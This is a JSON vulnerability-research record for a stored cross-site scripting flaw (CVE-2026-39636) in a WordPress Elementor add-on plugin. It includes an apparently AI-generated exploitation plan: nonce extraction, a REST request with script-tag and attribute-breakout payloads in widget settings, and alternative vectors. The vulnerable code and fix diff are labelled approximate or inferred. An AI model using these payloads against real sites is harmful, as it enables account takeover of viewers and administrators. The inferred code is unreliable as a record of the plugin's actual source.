[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEDXAHgJyV1vZnbhj67HMmdo8NSwGDQ9SFNysYk1Lcbs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39636","livemesh-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-2","Livemesh Addons for Elementor \u003C= 9.0 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.0 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","addons-for-elementor",null,"\u003C=9.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-13 00:00:00","2026-04-15 21:21:16",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fff0e8c96-8401-4d01-8185-03967e2aee54?source=api-prod",[],"researched",false,3,"This research plan targets **CVE-2026-39636**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Livemesh Addons for Elementor** plugin. The vulnerability allows authenticated users with Contributor-level permissions or higher to inject malicious scripts into pages via unsanitized Elementor widget settings.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the rendering logic of one or more Elementor widgets provided by the **Livemesh Addons for Elementor** plugin. When a widget's settings (stored as JSON in post metadata) are processed for display, the plugin fails to properly sanitize the input or escape the output. Because Elementor's `render()` methods often use `$settings['parameter_name']` directly in HTML output without calling `esc_html()`, `esc_attr()`, or `wp_kses()`, an attacker can inject arbitrary JavaScript.\n\n### 2. 
Attack Vector Analysis\n*   **Vulnerable Endpoint**: Elementor's REST API endpoint for saving post data: `\u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F{post_id}`.\n*   **Vulnerable Parameter**: The `data` array within the REST request body, specifically within the `settings` object of a Livemesh widget.\n*   **Required Role**: Contributor or higher (users who can edit posts and access the Elementor editor).\n*   **Preconditions**: The plugin **Livemesh Addons for Elementor** and the **Elementor** base plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Entry**: A Contributor user edits a post using the Elementor editor.\n2.  **Input**: When the user saves the post, the Elementor UI sends a `POST` request to the REST API with the widget configuration in JSON format.\n3.  **Storage**: WordPress\u002FElementor saves this JSON into the `_elementor_data` post meta for that `post_id`.\n4.  **Processing**: When the page is viewed, Elementor calls the `render()` method of the specific Livemesh widget class (e.g., `LAE_Posts_Grid_Widget` or `LAE_Heading_Widget`).\n5.  **Sink**: The `render()` method retrieves settings using `$this->get_settings_for_display()`. It then outputs a value (e.g., a title, URL, or CSS class) directly via `echo` or by appending it to an HTML string without context-appropriate escaping.\n6.  **Execution**: The browser renders the page, and the injected script executes in the context of any user viewing the page (including Administrators).\n\n### 4. Nonce Acquisition Strategy\nElementor requires a REST API nonce (`_wpnonce`) for all save operations.\n\n1.  **Identify Shortcode**: Livemesh widgets don't typically have their own shortcodes; they are built into the Elementor editor.\n2.  **Create Test Page**: \n    ```bash\n    wp post create --post_type=page --post_status=draft --post_title=\"XSS Lab\" --post_author=CONTRIBUTOR_ID\n    ```\n3.  
**Navigate to Editor**: Use `browser_navigate` to go to the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post={post_id}&action=elementor`.\n4.  **Extract Nonce**: Elementor localizes its configuration in the `window.elementorCommon` or `window.elementorConfig` objects.\n    *   **Action**: `browser_eval(\"window.elementorConfig.api_nonce\")` or `browser_eval(\"window.wpApiSettings.nonce\")`.\n5.  **Alternative (REST)**: If the REST API is used directly, the nonce for the `wp_rest` action is often found in the page header or the `wp-api.js` localization: `window.wpApiSettings.nonce`.\n\n### 5. Exploitation Strategy\nThe goal is to update a post's Elementor data with a malicious widget configuration.\n\n1.  **Pre-requisite**: Obtain a valid Post ID that the Contributor can edit.\n2.  **Request Construction**:\n    *   **Method**: `POST`\n    *   **URL**: `\u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F{post_id}`\n    *   **Headers**:\n        *   `Content-Type: application\u002Fjson`\n        *   `X-WP-Nonce: [EXTRACTED_NONCE]`\n    *   **Payload (JSON)**:\n        ```json\n        {\n          \"data\": [\n            {\n              \"id\": \"random_id_1\",\n              \"elType\": \"section\",\n              \"elements\": [\n                {\n                  \"id\": \"random_id_2\",\n                  \"elType\": \"column\",\n                  \"elements\": [\n                    {\n                      \"id\": \"random_id_3\",\n                      \"elType\": \"widget\",\n                      \"widgetType\": \"lae-posts-grid\", \n                      \"settings\": {\n                        \"title\": \"Normal Title\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\n                        \"custom_class\": \"\\\">\u003Cscript>alert('xss')\u003C\u002Fscript>\"\n                      }\n                    }\n                  ]\n                }\n              ]\n            }\n          ]\n        }\n        ```\n        
*(Note: `widgetType` may vary based on the specific vulnerable widget. Common Livemesh types: `lae-posts-grid`, `lae-services`, `lae-team-members` (inferred))*\n\n3.  **Trigger**: Navigate to the frontend URL of the post: `\u002F?p={post_id}`.\n\n### 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n2.  **Post**: Create a post or page as that contributor.\n3.  **Elementor Enablement**: Ensure the post type is enabled for Elementor (usually default for `post` and `page`).\n4.  **Widget Discovery**: Run a grep to find widget names:\n    ```bash\n    grep -r \"get_name\" wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002F\n    ```\n\n### 7. Expected Results\n*   The REST API should return a `200 OK` confirming the post update.\n*   Upon navigating to the post frontend, the browser should execute the `alert()` payload.\n*   The raw HTML source of the page should contain the unescaped `\u003Cscript>` tag inside the widget's container.\n\n### 8. Verification Steps\n1.  **Check Database**: Use WP-CLI to verify the payload is stored in the post meta:\n    ```bash\n    wp post meta get {post_id} _elementor_data\n    ```\n2.  **Verify Rendering**: Check if the output is escaped in the frontend:\n    ```bash\n    http_request GET \"\u002F?p={post_id}\" | grep \"alert\"\n    ```\n\n### 9. 
Alternative Approaches\n*   **Widget Attribute Injection**: If the `title` field is sanitized, try injecting into attributes like `link` or `id` fields:\n    *   Payload: `href=\"javascript:alert(1)\"` or `class=\"'>\u003Cimg src=x onerror=alert(1)>\"`\n*   **Elementor Template Library**: If the Contributor can save templates, try injecting the payload into a Livemesh widget within a saved template (`wp-json\u002Felementor\u002Fv1\u002Ftemplates`).\n*   **Specific Widget Search**: If `lae-posts-grid` is patched, audit widgets that handle raw HTML or text, such as:\n    *   `lae-heading` (inferred)\n    *   `lae-button` (inferred)\n    *   `lae-testimonial` (inferred)\n\n*Note: In versions \u003C= 9.0, the vulnerability is reported as broad. If the \"Posts Grid\" widget is not vulnerable, the \"Generic Heading\" or \"Animated Text\" widgets are primary secondary targets.*","The Livemesh Addons for Elementor plugin fails to properly sanitize and escape user-controlled widget settings such as titles or custom HTML attributes. This allows authenticated users with Contributor-level permissions to inject malicious JavaScript into pages via the Elementor editor, which executes when visitors or administrators view the page.","\u002F\u002F File: wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002Fposts-grid.php (approximate)\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    \n    \u002F\u002F Unescaped output of user-provided settings\n    if ( ! empty( $settings['title'] ) ) {\n        echo '\u003Ch3 class=\"lae-module-title\">' . $settings['title'] . '\u003C\u002Fh3>';\n    }\n    \n    if ( ! empty( $settings['custom_class'] ) ) {\n        echo '\u003Cdiv class=\"lae-posts-grid ' . $settings['custom_class'] . '\">';\n    }\n    \u002F\u002F ... 
further rendering logic\n}","--- wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002Fposts-grid.php\n+++ wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002Fposts-grid.php\n@@ -212,5 +212,5 @@\n-    if ( ! empty( $settings['title'] ) ) {\n-        echo '\u003Ch3 class=\"lae-module-title\">' . $settings['title'] . '\u003C\u002Fh3>';\n-    }\n+    if ( ! empty( $settings['title'] ) ) {\n+        echo '\u003Ch3 class=\"lae-module-title\">' . wp_kses_post( $settings['title'] ) . '\u003C\u002Fh3>';\n+    }\n \n-    if ( ! empty( $settings['custom_class'] ) ) {\n-        echo '\u003Cdiv class=\"lae-posts-grid ' . $settings['custom_class'] . '\">';\n-    }\n+    if ( ! empty( $settings['custom_class'] ) ) {\n+        echo '\u003Cdiv class=\"lae-posts-grid ' . esc_attr( $settings['custom_class'] ) . '\">';\n+    }","The exploit targets the Elementor REST API endpoint used for saving post content. An attacker with Contributor-level access follows these steps: 1. Authenticates to the WordPress dashboard and initializes an Elementor editing session for a post they own. 2. Obtains the REST API nonce (X-WP-Nonce) from the 'elementorConfig' or 'wpApiSettings' JavaScript objects in the editor UI. 3. Sends a POST request to \u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F{post_id} containing a JSON 'data' payload. 4. Within this payload, they define a Livemesh widget (e.g., 'lae-posts-grid') and inject an XSS payload like \u003Cscript>alert(document.domain)\u003C\u002Fscript> into settings fields such as 'title' or 'custom_class'. 5. 
Once the post is saved, any user (including site administrators) who views the published post or page will execute the injected script in their browser context.","gemini-3-flash-preview","2026-04-20 23:59:23","2026-04-20 23:59:40",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor\u002Ftags"]